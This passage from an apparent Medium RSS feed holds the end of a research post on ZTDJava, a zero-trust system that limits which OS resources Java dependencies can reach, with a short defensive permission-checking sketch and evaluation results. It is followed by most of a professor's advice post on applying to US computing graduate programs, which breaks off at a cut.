bibliography), but we hope you get the idea — prior approaches achieve some of these requirements, but not all at once.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/680/1*EU5ZtVbq2ZE0Lkd0ygYS7A.png" /><figcaption>Analysis of existing security defenses by ZTA principles. Columns indicate if each technique family provides secure resource access, supports least privilege discovery and enforcement, enables continuous monitoring for dependencies, and has low runtime costs</figcaption></figure><h3><strong>ZTDsys: A ZTD System Design</strong></h3><p>ZTDsys comprises two major components: automated policy generation and context-sensitive policy enforcement.</p><h4><strong><em>Automated Policy Generation</em></strong></h4><p>One of the key challenges is knowing what permissions each dependency needs. Software engineers often don’t know the internal workings of every library. Our ZTD system addresses this with automated policy generation.</p><p>The system observes the resources accessed by each dependency during normal application execution and creates policy files based on this observed behavior. This removes the guesswork and provides an initial set of permissions. These policies are then accessible to engineers to review and adjust.
Application engineers can run ZTD policy generation during the testing phase if their test suites are comprehensive, or for a short period of time in production.</p><h4><strong>Context-sensitive Policy Enforcement</strong></h4><p>For policy enforcement, ZTD intercepts resource access calls made by the application and checks whether the dependencies involved in the call have the necessary permission. We highlight two aspects of this process; a short code sketch below makes them concrete.</p><ol><li><strong>Context-sensitivity</strong>: In an application, one dependency can also depend on another dependency. To prevent an unauthorized dependency from leveraging another dependency’s permission, ZTDsys requires all dependencies involved in a resource access operation (based on the classes or files present in the call stack) to have the necessary permission.</li><li><strong>Efficiency</strong>: An application may have hundreds of dependencies. In some languages, like Java, only class names, not dependency names, are present in the running application, so a flat map from dependency name to permissions cannot be consulted directly. To keep policy lookups fast regardless of the number of dependencies, ZTD uses a radix tree [9] to store dependency policies, where the components of a class name or file path form the nodes of the tree.</li></ol><h4>ZTDJava: A Java Implementation</h4><p>We prototyped the ZTD concept for Java applications. We call the prototype, quite creatively I know, “ZTDJava”. As the following figure illustrates, ZTDJava modifies core Java library classes that are used to access operating system resources (e.g. FileInputStream for file read, ProcessBuilder for shell execution). Whenever a modified method is called, ZTDJava’s runtime monitor checks the policy. If unauthorized access is attempted, ZTDJava can either proactively block the access (fatal enforcement) or log the event for prompt but reactive incident management (non-fatal enforcement). This provides flexibility to balance security with application reliability. In fact, if ZTDJava had been available before the Log4J incident, organizations could simply have removed network access permissions from their Log4J dependency and they would have been protected from the attacks. The vast majority of Log4J users did not need the network functionality, but were shipping with it enabled anyway.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/774/0*VUO9unHtKZv6U4Gu" /><figcaption>The design of the ZTDJava prototype showing its five components. ZTDJava allows application engineers to generate and enforce least privilege policies in their dependencies.</figcaption></figure><h4><strong>Evaluation: Effectiveness and Cost</strong></h4><p>For effectiveness, we tested ZTDJava against real-world exploits of known vulnerabilities. It successfully blocked all exploits in both sample and real applications. This demonstrates ZTD’s ability to mitigate a range of attacks.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/0*Ns6pVxtrvHuF4SUL" /><figcaption>Effectiveness of ZTDJava in preventing exploits of SSC vulnerabilities. It blocked exploits of 15 vulnerabilities in sample applications, and 9 vulnerabilities injected in real applications.</figcaption></figure>
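<p>To make the enforcement path concrete, here is a sketch of the context-sensitive check described above. The class names, permission strings, and policy store are illustrative assumptions for this post; ZTDJava instruments core library classes and uses a radix tree, whereas this sketch takes the call stack as a parameter and scans a sorted map so that it runs standalone.</p><pre>import java.util.*;

// A sketch of ZTD-style context-sensitive permission checking. Every
// dependency that appears on the call stack must hold the permission, so an
// unauthorized dependency cannot launder a resource access through an
// authorized one.
public class ZtdCheckSketch {
    // Dependency package prefix mapped to granted permissions. ZTDJava stores
    // policies in a radix tree; a sorted map keeps this sketch short.
    private final NavigableMap&lt;String, Set&lt;String&gt;&gt; policy = new TreeMap&lt;&gt;();

    public void grant(String packagePrefix, String permission) {
        policy.computeIfAbsent(packagePrefix, k -&gt; new HashSet&lt;&gt;()).add(permission);
    }

    // Longest registered prefix wins; null means the class belongs to no
    // registered dependency, i.e., first-party code, which this sketch trusts.
    private Set&lt;String&gt; permissionsOf(String className) {
        for (Map.Entry&lt;String, Set&lt;String&gt;&gt; e : policy.descendingMap().entrySet()) {
            if (className.startsWith(e.getKey())) return e.getValue();
        }
        return null;
    }

    // Called from a modified resource-access method. In a real monitor the
    // stack would come from the runtime; it is a parameter here for testing.
    public boolean allowed(String permission, List&lt;String&gt; stackClassNames) {
        for (String cls : stackClassNames) {
            Set&lt;String&gt; perms = permissionsOf(cls);
            if (perms != null &amp;&amp; !perms.contains(permission)) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        ZtdCheckSketch ztd = new ZtdCheckSketch();
        ztd.grant("org.apache.logging.log4j", "FILE_WRITE");

        List&lt;String&gt; stack = Arrays.asList(
            "com.example.app.Main",                  // first-party: trusted
            "org.apache.logging.log4j.core.Logger"); // dependency on the stack
        System.out.println(ztd.allowed("FILE_WRITE", stack)); // true
        System.out.println(ztd.allowed("NETWORK", stack));    // false: blocked
    }
}</pre><p>For cost, performance overhead and configuration effort are the key concerns. 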
The table below summarizes both aspects, using the recent DaCapoBench suite, which comprises realistic Java applications for a range of operating contexts (e.g., databases and web servers).</p><ul><li>We compared ZTDJava’s performance with the Java Security Manager (JSM). ZTDJava had negligible overhead (~0%), compared to the JSM’s 21% median overhead. This efficiency is due to ZTD’s focused approach (protecting only a few critical resources) and our efficient policy enforcement.</li><li>We also compared the configuration cost of ZTDJava and the JSM. In the final column of the table, the notation “x/y” means that x dependencies needed ZTDJava policies, and each policy provides an average of y permissions. These policies were generated automatically by observing runs of the application. The configuration costs were much lower than those of obtaining equivalent policies under the JSM.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/476/0*jn5G8Fgu4SFMUdBq" /><figcaption>Comparing ZTDJava and the JSM’s performance overhead. ZTDJava introduces a median 0% overhead while the JSM introduces 21%.</figcaption></figure><h3><strong>Conclusion</strong></h3><p>ZTD is about taking a proactive approach to security. Instead of blindly trusting our dependencies, we can control their access to sensitive resources and mitigate potential security threats. This is a shift in mindset, but one that can significantly improve the security of our applications. ZTDJava demonstrates the practicality and effectiveness of this approach, offering a powerful tool for modern software development.</p><h4>Learn more</h4><p>To learn more about ZTD, our methods, system design and results, check out our paper here: <a href="https://arxiv.org/abs/2310.14117">https://arxiv.org/abs/2310.14117</a></p><p>You can also build and use ZTDJava in your Java application. Access the source code here: <a href="https://doi.org/10.5281/zenodo.14436182">https://doi.org/10.5281/zenodo.14436182</a></p><p>Our lab has been working on other approaches to improving software supply chain security. 
Some of our other work is about:</p><ol><li><a href="https://medium.com/@davisjam/signing-in-four-public-software-package-registries-quantity-quality-and-influencing-factors-7af4b416b6db">Quantitative</a> and <a href="https://davisjam.medium.com/an-industry-interview-study-of-software-signing-for-supply-chain-security-8666d27539f8">qualitative</a> measurements of software signing in practice</li><li><a href="https://davisjam.medium.com/on-the-contents-and-utility-of-iot-cybersecurity-guidelines-9a0479949ba3">Thinking about cybersecurity guidelines</a></li><li><a href="https://medium.com/p/6a0c897d5777">Defining the properties of a secure software supply chain</a></li><li>Thinking about secure pre-trained model supply chains (<a href="https://davisjam.medium.com/an-empirical-study-of-artifacts-and-security-risks-in-the-pre-trained-model-supply-chain-2c75fd99942b">1</a>, <a href="https://docs.lib.purdue.edu/cgi/viewcontent.cgi?article=1181&amp;context=ecepubs">2</a>, <a href="https://medium.com/@davisjam/an-empirical-study-of-pre-trained-model-reuse-in-the-hugging-face-deep-learning-model-registry-6ccfb0e58809">3</a>, <a href="https://arxiv.org/pdf/2310.01642">4</a>)</li></ol><h3><strong>References</strong></h3><p>[1] <a href="https://tblocks.com/articles/how-to-prevent-a-log4j-jndi-attack/">https://tblocks.com/articles/how-to-prevent-a-log4j-jndi-attack/</a></p><p>[2] <a href="https://www.scworld.com/feature/digging-into-the-numbers-one-year-after-log4shell">https://www.scworld.com/feature/digging-into-the-numbers-one-year-after-log4shell</a></p><p>[3] <a href="https://cloud.google.com/learn/what-is-zero-trust">https://cloud.google.com/learn/what-is-zero-trust</a></p><p>[4] <a href="https://www.microsoft.com/en-us/security/business/zero-trust">https://www.microsoft.com/en-us/security/business/zero-trust</a></p><p>[5] <a href="https://www.docker.com/resources/what-container/">https://www.docker.com/resources/what-container/</a></p><p>[6] <a href="https://docs.oracle.com/javase/tutorial/essential/environment/security.html">https://docs.oracle.com/javase/tutorial/essential/environment/security.html</a></p><p>[7] Vasilakis, N., Staicu, C. A., Ntousakis, G., Kallas, K., Karel, B., DeHon, A., &amp; Pradel, M. (2021, November). Preventing dynamic library compromise on Node.js via RWX-based privilege reduction. In Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security (pp. 1821–1838).</p><p>[8] Vasilakis, N., Karel, B., Roessler, N., Dautenhahn, N., DeHon, A., &amp; Smith, J. M. (2018, February). BreakApp: Automated, Flexible Application Compartmentalization. In Network and Distributed System Security (NDSS).</p><p>[9] <a href="https://en.wikipedia.org/wiki/Radix_tree">https://en.wikipedia.org/wiki/Radix_tree</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=06f950497cfe" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Prof. Davis’s Advice on Applying to Graduate School in Computing in the USA]]></title>
            <link>https://davisjam.medium.com/prof-daviss-advice-on-applying-to-graduate-school-in-computing-in-the-usa-160cb539ecab?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/160cb539ecab</guid>
            <category><![CDATA[graduate-school]]></category>
            <category><![CDATA[research]]></category>
            <category><![CDATA[education]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Mon, 28 Apr 2025 19:58:43 GMT</pubDate>
            <atom:updated>2025-04-28T19:58:43.390Z</atom:updated>
            <content:encoded><![CDATA[<h3>Summary</h3><p>This blog contains my advice on applying to research-intensive graduate programs in computing in the USA. I think the world is made a better place by engineers who understand the capabilities and limitations of computers and can think critically about when and how to apply them, so I think the world needs more people who complete graduate school in computing. I also think that many people want to complete graduate training in computing but are held back by their applications — applications that do not communicate the information that reviewers need to assess them. The purpose of this blog is to help prospective students communicate their aspirations and qualifications. This blog is not about “three funny tricks that will get you into graduate school”. There are no shortcuts here. But I hope it is helpful to applicants who do not have access to mentoring on this topic, so that they can prepare the best application possible based on their accomplishments and circumstances.</p><p>This is a long blog. I’ve used headings to help you navigate. The main topics are:</p><ul><li>Why take my advice?</li><li>What is graduate school like?</li><li>Pros and cons of graduate school</li><li>Choosing a program</li><li>Advice on the components of a graduate application</li></ul><p>I’ve deliberately saved the concrete advice on applications until after the general information about the nature of graduate school. Many applicants do not understand the meaning of graduate study, so I thought it best to start there and let you decide if it’s really the path you’re looking for.</p><h3>Why take my advice?</h3><p>I have a PhD in Computer Science from Virginia Tech. I applied to ~10 computing graduate programs myself and was admitted into some, though not all. I am now an assistant professor in ECE at Purdue University, where I have reviewed hundreds of applications at the MSc and PhD level, and coached dozens of students as they prepared applications. This blog contains my perspective. If you search the Internet you can find what many other professors have said.</p><h3>What is graduate school like?</h3><h4>Graduate school is not like undergrad</h4><p>Repeat after me: “Graduate school is not like undergraduate. Graduate school is not like undergraduate. Graduate school is not like undergraduate”.</p><ul><li>The goal of <em>undergraduate training</em> is for you to master the body of knowledge in your topic, to a sufficient degree that you can pick up new topics in the workplace. Most undergraduate programs give a guided tour of many textbooks on many topics. If you complete a bachelor’s degree in computing, then you’ve probably encountered many topics in a shallow way — a bit of object-oriented programming, a dash of operating systems, a soupçon of data structures, a neural network here and there, and a rough understanding that everything is layers and abstractions. Congratulations, you are ready for the workforce! (at least, if anyone is hiring this year). Different jobs will then call for different specializations, which means that you might find yourself getting a lot of domain expertise in farming, or knowledge about GIS and GPS, or taking a deep dive into distributed systems, or becoming a wizard at algorithm development. Thanks to your practice through undergrad at learning new things, you’ll be able to self-learn and master these topics too.</li><li>The goal of <em>graduate training</em> is for you to take a deep dive on a particular topic. 
Instead of learning a little bit about many topics, you will learn a great deal about a few topics. The idea is for you to specialize — you might focus on cybersecurity, or on machine learning, or on privacy, or on distributed system design, or on many other topics — so that you can work on the hardest problems in industry. Where undergraduate training takes a smorgasbord approach and you get to try your hand at many things, graduate training pushes you to a deep study of a single topic. Some graduate degrees have these specializations in the title (<em>e.g.</em>, “MSc in Distributed Systems”) while others do not, and leave it to you to select the courses that will give you the expertise you want. You technically <em>can </em>complete an MSc in a smorgasbord style, by picking and choosing a random assortment of classes, but I wouldn’t recommend it. If you’re going to the trouble of completing graduate training then you’d better get a specialization out of it. Conversely, if your actual goal is to keep taking classes because you enjoy learning, may I humbly recommend that you get an engineering job and buy some textbooks on eBay to study nights and weekends?</li></ul><h4>Kinds of graduate degrees in computing</h4><p>There are three main kinds of graduate training.</p><ol><li><em>The MSc-Coursework/Project</em>. A coursework MSc means that you have developed some mastery of a specialized topic, but have not yourself produced new knowledge. MSc-Coursework students almost never receive funding from the program that admits them.</li><li><em>The MSc</em>-<em>Thesis</em>. A thesis MSc means that you have made a modest contribution to humanity’s knowledge on a particular topic. The topic you choose may be up to you (and your advisor), though expect more constraints because the advisor will be trying to help you choose a topic that you can plausibly complete in 2–3 years. MSc-Thesis programs will sometimes come with a guarantee of funding (tuition + stipend), though this is now unusual.</li><li><em>The doctorate (PhD)</em>. A PhD means that you have made a substantial contribution to humanity’s knowledge on a particular topic. The topic you choose is up to you (with guidance from your advisor). PhD programs often come with a guarantee of funding (tuition + stipend), sometimes explicit and sometimes predicated on satisfactory progress.</li></ol><p>Which one should you pursue? I advise you to begin with the end in mind. If your career goal is to have a job with the title “researcher”, whose responsibilities are to discover new things or apply them for a company, a government, or a university, then you should pursue a PhD. If you would like to assist in such endeavors, or aren’t yet sure you want to commit to the PhD, then you should pursue the MSc-Thesis. If you want to get an advanced engineering role, then an MSc-Coursework should be fine, though a thesis won’t hurt.</p><p>These degrees are arranged in increasing order of the difficulty of gaining entry to the program (and of completing the program once you’re in it). Many schools will be happy to admit undergraduates with a 3.5+ GPA into an MSc-coursework program; you’ve shown you can do coursework and you are welcome to continue to study. Obtaining entry to an MSc-Thesis or a PhD requires a track record of excellence in scholarship (often a 3.75+ GPA) as well as independence of thought. 
More on this later.</p><h3>Pros and cons of graduate school</h3><h4>Pros</h4><p>The greatest benefit of graduate school, and here I am particularly thinking of research-oriented programs, is that it is the best way I know of to truly improve your mind. If you are completing a research-based degree, you must discover something new and communicate it to others. If you don’t, no self-respecting advisory committee will sign your degree. Take a moment and think about how remarkable this requirement is. I suspect that at no point during your previous schooling — 13 years of K-12 and 4 more of undergrad — have you been expected to produce something new. Most people go through their entire lives without ever discovering something new. The process of creating new knowledge requires you to undergo rigorous criticism from your advisory committee, who will poke and prod at every suggestion you make in order to help you refine your thinking. Researchers seek the beauty of new ideas. There is a profound poetry here, and it can be a wonderful experience.</p><p>A more obvious upside of graduate school (whether research- or coursework-based) is the <em>chance to learn the latest knowledge in your field</em>. As an undergraduate student, you probably sat through at least one giant lecture-style class with dozens or hundreds of students all sleeping through the same slides and boring textbook. That experience happens in part because many professors consider the material in question to be rote and uninteresting — after all, this material hasn’t changed in years — and so they don’t care much about teaching it. At the graduate level, you’re taking advanced courses that are kept up to date because the material keeps changing (new knowledge and techniques keep getting discovered). Faculty are also much more enthusiastic about the teaching because they are teaching the advanced topics that they themselves study and love. This doesn’t guarantee they are good teachers, of course, but on average the classes will be more engaging.</p><p>Another benefit, and related to the previous one: <em>graduate school unlocks some job opportunities</em>. Specifically, if you want to work in a research and development (R&amp;D) role, especially at a larger company, then you typically need a graduate degree. Want to work at Microsoft Research? Almost everyone there has a graduate degree. Want to work at IBM Research? Almost everyone there has a graduate degree. Want to work at Argonne National Labs? Almost everyone there has a graduate degree. There are exceptions, of course — research divisions often have what are called <em>research engineer</em> roles that may be filled by folks with bachelor’s degrees; and sufficiently brilliant-and-lucky people seem to be able to get a job anywhere — but most people who want roles like these will complete a graduate degree. Graduate degrees may also help you obtain a US work visa by providing a basis for arguments about your global preeminence or specialized expertise.</p><p>A final upside is the chance to <em>study with like-minded peers</em>. In your undergraduate school you may have had peers who were just going through the motions to get a degree. You may have been on a group project with them (sorry about that). In graduate school there are still some people like this, but most students are in graduate school because they love learning and want to be great in their chosen careers. 
It is truly a joy to work and study with other students who take school seriously and who really want to master the material. Many folks in the military go through boot camp and make friends for life. Similarly, many folks in the professions go through graduate training and make friends for life.</p><h4>Cons</h4><p>I think the biggest downside of graduate school is the <em>financial opportunity cost</em>. Time in school is time spent not working, and time spent not working is time spent not earning money. In computing, many entry-level jobs have a $100K+ compensation package between salary and benefits, including 401(k) matching and other retirement benefits. So, for every year you spend in graduate school, let’s say that you are giving up perhaps $150K/year. For a two-year MSc that’s $300K (the cost of a house in many parts of the USA); over the course of a 6-year PhD that’s $900K (most of a comfortable retirement!). Sometimes the job market is rough for fresh BSc graduates and getting a job is hard. But a little patience and practice usually rewards the applicant much more quickly than the two years spent getting an MSc. Don’t get me wrong, people with graduate degrees do usually start at a higher salary than those with a BSc. But the bump is not enough to offset the missed income, especially since your BSc peers will have had a few years of raises and bonuses and 401(k) matches and so on before you start working yourself.</p><p>There are some other possible downsides — grad school is mentally and emotionally taxing; you might not like the climate or the location of the university; many college towns have trouble with abusive landlords; and so on. But in computing, I think the biggest cost to weigh is financial.</p><h4>Topics on which I am ambivalent</h4><p>In computing, many students are interested in entrepreneurship. Does a graduate degree help here? It’s hard to say. I know some entrepreneurs with a BSc and others with a PhD. I have heard that the credential impresses some venture capitalists (“Ooh, this founder must be smart!”), and the sharpened thinking may help. But the successful entrepreneurs I know are a pretty sharp bunch regardless of their credentials, and most venture capitalists will care more about your business plan than the letters after your name. Instead of graduate school, you might be better off working a bit and saving scrupulously so you can self-fund the venture and avoid diluting your ownership. The exception here is graduate (or undergraduate) studies at high-prestige institutions, where the professional network you obtain can create new opportunities for you.</p><p>Many computing students go into management roles. Here, again, graduate training in computing may be helpful, but it’s certainly not required.</p><h4>My analysis</h4><p>Personally, I think that if you are a person who loves to learn and study, and you do not have pressing personal obligations that require money, then you should seriously consider graduate school. You should never pass up an opportunity to improve your mind. Over the course of a career in computing you’ll make plenty of money. You don’t need a car right now and you can wait a few years to buy a house. Meanwhile, an investment in your mind now will benefit you for the rest of your life. 
However, if you have a family that needs to eat, or parents who are struggling, or any of the myriad reasons for which one needs money, then of course you must be guided by these responsibilities.</p><h3>Choosing a program</h3><h4>Do rankings matter?</h4><p>Yes, rankings matter. Let me be clear: I do not think that rankings have much effect on the quality of the education you will receive. There are great professors and great research opportunities at universities all over the United States, at schools big and small, top-ranked and low. However, rankings do affect the opportunities that will be available to you after you graduate. Why? Well, one of the biggest challenges in running a successful organization (or funding winning startups) is choosing good staff. Staff selection is hard because you cannot easily judge a person’s character or the quality of their work from their application. Hence, most hiring managers rely, to a greater or lesser degree, on the applicant’s reputation. The ranking of the school you attend will rub off on you a bit, and so will the professional network associated with your school. Did you go to a famous school like Harvard, Yale, MIT, or Berkeley? You’ll have no trouble getting interviews and job offers. Did you go to a little school nobody has heard of? You won’t have the benefit of your institution’s reputation to support your job application. This doesn’t mean you’ll be a bad employee or entrepreneur, but it does mean you will have to work harder to convince others of that fact.</p><p>So, if you are choosing between schools that are at least 10 ranks apart, then you should prefer the higher ranked one. However, if the schools are only a few ranks apart, then you should consider the specific attributes of the programs.</p><p>For US schools in computing, there are two major ranking systems. The first is the US News Graduate Ranking System, which is reputation-based. Check both the CS and the ECE rankings. The second is the website csrankings.org. This website is publication-based; it uses the DBLP database to count the number of papers published at top-tier venues by faculty at each school. Note that this website only includes faculty who can solely supervise a PhD in CS, which means that many researchers (including me!) are excluded from it. If you compare the two rankings, you’ll see that some schools, such as Carnegie Mellon, Purdue, Michigan, and Georgia Tech, show up in both places, while others are highly ranked in one and not the other.</p><p>Here’s how I think about it. The csrankings system considers the raw number of publications, which will favor schools that have many faculty. The US News system considers the reputation of the faculty and the graduates, which will favor schools that set a high bar for rigor and depth of thinking. Some schools have both, while others are more oriented toward one or the other. Both systems have their merits — US News makes for an easy-to-use number, and csrankings gives a fine-grained analysis by topic, and makes it easier to see which faculty at each institution you should talk to.</p><h4>For research-focused applicants, especially PhD: Keep your advisor options open</h4><p>There is plenty of research on success in graduate school, and in particular on the success of research-focused students (MSc-Thesis and PhD). The factor that most strongly correlates with success — and with a hefty effect size — is your relationship with your advisor. 
Not the school, not the topic of the research, not the resources, not the size of the stipend. It all comes down to the advisor-advisee relationship. So the most important factor to consider as you select programs is this: <em>Does this department have faculty members who could be a good advisor for me? </em>A suitable department will have not one, but multiple viable advisors. Having options is important because faculty members do change institutions, take leaves of absence, and leave academia.</p><p>I cannot emphasize this enough: If you are interested in doing research, do not apply to a department simply because it is famous. Apply to a department whose faculty are well suited to advise you. Sure, you should consider rankings (see previous topic), but without good advising your graduate career will be an unpleasant one.</p><p>Now, how to find these prospective advisors? First you’ll need to have nailed down your research interests, at least broadly. (See the topic below, “<em>Statement of purpose</em>”). Then, you’ll want to find the faculty members who are actively working in this topic. I recommend two distinct approaches — you should try them both.</p><p>1. Use the department website. Departments enumerate all of their faculty, and the department view will let you see how the faculty are collaborating — for example, you can look for the centers of excellence in the department.</p><p>2. Use <a href="https://csrankings.org/">www.csrankings.org</a>. This website lets you see the faculty who currently publish in the most prestigious computing venues, organized by sub-discipline of computing. You should be cautious about the actual rankings provided by this website, because it has a bad case of tunnel vision — as mentioned above, it only counts faculty who can supervise a PhD student in “Computer Science”, which omits the many computing researchers who work in Colleges of Informatics, Polytechnic Institutes, and departments of Electrical &amp; Computer Engineering. However, if a university does <em>not </em>have a research-active CS department then it probably does not have much active research in computing.</p><h3>The graduate school application</h3><p>I hope my thoughts above have helped you assess whether you want to do graduate study at all, and the institution(s) you might consider. But you opened this blog looking for advice on how to get into a graduate program! So let’s dive in.</p><h4>Purpose of the application</h4><p>Across your application package, you are trying to answer three questions.</p><ol><li><em>Why graduate school?</em> First, explain what your long-term career goals are and how they will be advanced by graduate study. Do you want to be a professor? Then graduate school clearly makes sense. Do you want to be an engineer? Then explain carefully why graduate study is relevant to this goal.</li><li><em>Why are you suited to succeed in graduate school</em>? Second, persuade us that you have the appropriate foundation and experiences to succeed in graduate study. I am looking for students who have excelled at every opportunity they have been given. When I look at students from the USA, where I grew up, it is relatively easy for me to assess this. When I look at students from other countries, it is a lot harder. Do us a favor — help us interpret your application!</li><li><em>What do you want to do in graduate school?</em> Third, explain to us what you would like to accomplish while you are in graduate school. What project or thesis will you work on? 
What is your vision for the work, and why are you able to do it? What faculty would you like to work with on that project?</li></ol><h4>How applications are reviewed</h4><p>Applications are reviewed by an admissions committee. Committee processes vary widely from institution to institution, but as a rough approximation, you should assume that your reviewers are examining 50 applications and looking for the 0–5 best ones in their pile. Their evaluation rubrics will include (1) Relevance of prior coursework and experiences; (2) Demonstrated excellence in field of study; (3) Potential for success in open-ended research and engineering work; and (4) Quality of letters of recommendation.</p><p>Individual faculty (including those not on the admissions committee) may also review applicants who list their names as prospective supervisors. These faculty may be trying to fill an open position for a research assistant, and if you list their name it is another way to get their attention.</p><h4>Elements of the application</h4><p>Here are the standard elements of an application to graduate school in computing in the USA:</p><ul><li>Your resume / CV</li><li>Your letters of recommendation</li><li>Your statement of purpose / academic statement</li><li>Your personal statement</li><li>Your list of faculty of interest</li><li>Your performance on standardized tests</li></ul><p>Let’s look at each of them. I’ll describe each in terms of my own evaluation method.</p><p><strong>CV / Resume</strong>: This is where I start my review of an application. If your CV shows a good track record, then I will be looking at the letters of recommendation to give an unbiased view of your work, and your statement of purpose to see how your plans are connected to your past. On the other hand, if you have no track record of success — well, the saying in finance is that “past performance is no guarantee of future returns”, but it’s a pretty good predictor.</p><ul><li>The most basic question I ask is this: Is your CV formatted well? If you did not take the time to prepare an academic-style CV that highlights your academic skill, then your application may suffer because your reviewers cannot assess it well. You should not submit the same CV/Resume document to industry jobs and graduate schools. (Hint: look at the CVs of faculty at the institution you are applying to — they follow a pretty uniform style and you should emulate it. There are templates on Overleaf).</li><li>Did you attend a good undergraduate institution, earn good marks there, and demonstrate excellence through extracurricular activities? Do you have prior research experience?</li><li>Are the names of your letter-writers indicated on this CV where appropriate, so that I can correlate your experiences to others’ views of you?</li></ul><p><strong>Letters of recommendation</strong>: Do your supervisors agree that you have demonstrated excellence?</p><ul><li>You should be thoughtful about whom you select as letter-writers. You can also provide your letter-writers with reference material, e.g. a list of your accomplishments under their supervision. For example, did you obtain a patent? Remind your internship supervisor of it. Did you earn the best marks in a class? Remind your professor about it. Letter-writers are busy people and struggle to keep track of all of the details for all of the students they work with. 
I do not advise you to ghostwrite these letters, but it is helpful to make sure your letter-writers have a full record of your work with them.</li><li>For graduate study — whether research or coursework — the strongest letters are from PhDs who have supervised you in some open-ended research activity. The weakest letters are often from university staff such as members of a writing center or a tutoring center. Maybe you did great work there, but the admissions committee wants to know primarily about your technical skill as communicated by people we perceive as our peers.</li></ul><p><strong>Your statement of purpose / academic statement</strong>: This statement is devoted to explaining what you want to accomplish in your graduate studies. It should show how graduate study, at this institution, under this institution’s faculty, forms a reasonable stepping stone between your past achievements and your future goals. A graduate degree is about specialization, so you should describe the specialization you are seeking. If you are proposing to do research (PhD or MSc-Thesis), you should explain your plans. Be as specific as you can be; you may not have a project fully mapped out, but you should have read some recent papers on the topic and you should name the faculty at this institution who work on that topic and justify your selection.</p><p>A common structure for this document is to tell one’s life story as a narrative. To each their own, but I think this is a mistake. Your first paragraph should give the bottom line up front (BLUF). Shape the rest of the document in a way that makes sense, but make it easy for the admissions committee to put you into the appropriate bin (e.g. ML, computer systems, architecture, etc.) and contact the relevant faculty if they need a deeper opinion.</p><p><strong>Your personal statement:</strong> This statement is where you can explain the context from which you’ve come, and how you have excelled at every opportunity to which you have had access. Have you risen above your family’s socioeconomic circumstances? Have you had some experience we should know about that affected your grades or access to opportunities? Are you applying from a country whose institutions are not globally renowned? Tell us how to interpret the institution you attended (e.g. entrance exams?) and its rigor (e.g. alumni). Are you applying from a university where GPAs don’t convert easily to the US 4.0 system (e.g. you received a “first class honors” degree)? Help us read your CV.</p><p><strong>Your list of faculty of interest</strong>: All graduate programs would like to know the faculty under whom you want to study. Some may have a field for this on the application, while others don’t ask directly but expect you to put it in your statements. Either way, this question is <em>not</em> an optional part of the application. Part of your application process is to assess whether an institution has the right faculty to supervise you. If you do not put thought into this and make a good selection, it may harm your application. You will be perceived as not having thought things through.</p><p><strong>Your performance on standardized tests</strong>: These may include language tests as well as the GRE.</p><ul><li>Your performance on language tests may influence your ability to obtain funding — you may meet the university’s language requirement for admission, but the requirement for being a Teaching Assistant is often a higher bar.</li><li>The GRE is a more controversial one. 
GRE scores are now optional at many institutions. This increases the accessibility of the program (lower costs to apply), but it also decreases the amount of information that the admissions committee has about your case. Even if the scores are optional, my advice is that if you have the money, and do well on standardized tests, then taking the GRE may strengthen your application. If you are a native English speaker, you would be expected to have good performance on all aspects of this exam. If you are not a native English speaker, then I expect your quantitative score to be good (at least 160) and your verbal/writing scores to be above the 50th percentile. These scores give us a way to compare applicants worldwide, and good scores will be particularly beneficial for students who lack the advantage of a strong educational pedigree or strong letters of recommendation. Of course, one may argue that one’s studies in graduate school are not like the GRE, and that people training for the GRE dilute its utility as a predictor. My personal view (supported by research papers I’ve read on this topic, and by my observations of students) is that the GRE is still a reasonably good predictor of “cleverness”. While clever people do not always succeed in graduate school, non-clever people rarely do.</li></ul><h3>Calibrating your expectations</h3><p>In ECE@Purdue, we receive thousands of applications each year across our PhD and MSc programs. What are your odds of getting admitted?</p><p>The typical profile of the students that we admit into our research tracks looks like this:</p><ul><li>Undergrad GPA &gt; 3.5/4.0 from a respected undergraduate institution.</li><li>Letters from multiple faculty that describe, in detail, their observations of the ways in which you are an outstanding student.</li><li>Substantial extracurricular achievement, <em>e.g.</em>, undergraduate research, being part of a winning programming team, medaling in a national competition of some kind.</li><li>If they took the GRE, their scores are &gt;160 on the quantitative portion, and are not abysmal on the verbal and writing portion.</li></ul><p>Even these properties do not guarantee admission. When I applied to graduate school, I had a 4.0/4.0 GPA, letters from undergraduate research supervisors, 3 US patents, 3 years of experience as a software engineer at IBM, and near-perfect GRE scores. I was accepted to many but not all schools to which I applied.</p><p>I also note that US institutions have a truly global application pool, and we do not look for all of these criteria from all applicants. We are looking for students who have excelled at every opportunity they have been given, and are hungry for more. Admissions committees tend to be risk-averse, and they place a lot of emphasis on your track record and pedigree. But brilliance comes from every background; the admissions committee knows that there are exceptions to every rule, and perhaps it’s you.</p><p>But let’s do a little math. Suppose your odds of getting accepted into a Top-20 program are 5%, and let’s suppose that you apply to all 20 programs. What are the odds of being rejected by all of them? The equation is:</p><p>Prob(rejected by all) = 0.95 × 0.95 × … = 0.95^k, where k = 20. 
The result is 0.36 — in other words, with a 5% chance of acceptance, about one-third of the time you would expect your application to be rejected by all of the Top-20 programs.</p><p>I know many excellent students who applied only to the Top-10 programs, where their odds are even less favorable. Some of them are rejected by all of the schools they apply to, and this can place them in an uncomfortable position — they would have been happy to go to any good graduate program, and they simply misunderstood their chances of acceptance. If you are targeting MIT or bust, more power to you. But if you want a research career, don’t apply only to the Top 10 — include some safety schools, and remember that “safety school” in graduate school may mean going further down the rankings than you did in high school. Why is this? Well, for undergraduate study, most students are competing against the best and brightest from their own country. For graduate study in computing in the USA, you are competing against the best and brightest from the whole world — the USA has the best institutions, the best resources, the best climate for study, and the best opportunities after graduation. Everyone wants to come. That means that to get into the best programs, you need to stand out not only amongst the peers you remember from high school, but also against the rest of the world. Don’t lose heart, but also be realistic about your chances. One of your letter-writers should be willing to give you an estimate if you ask them. Alumni of your undergraduate institution can also give you tips about what kinds of schools they got into and how they planned their applications.</p><h3>Closing thoughts</h3><p>I hope that this guidance has been helpful. If you are interested in disciplining your mind and studying computing intensively, graduate school is a great option. I hope 